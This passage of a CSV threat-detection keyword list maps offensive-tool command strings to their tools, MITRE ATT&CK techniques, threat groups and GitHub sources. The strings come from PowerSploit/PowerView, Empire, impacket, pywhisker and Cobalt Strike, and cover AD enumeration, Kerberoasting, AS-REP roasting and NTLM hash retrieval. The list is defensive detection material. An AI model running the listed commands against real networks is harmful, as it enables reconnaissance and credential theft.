Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a 
collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetGroupMember -GroupName *DNSAdmins*","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. 
The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or lateral movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetUser -SPN*","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*GetNPUsers.py -request*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*getnthash.py -key *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*getnthash.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" 
+"*Get-NTLM.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*GetNTLMChallengeBase64*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
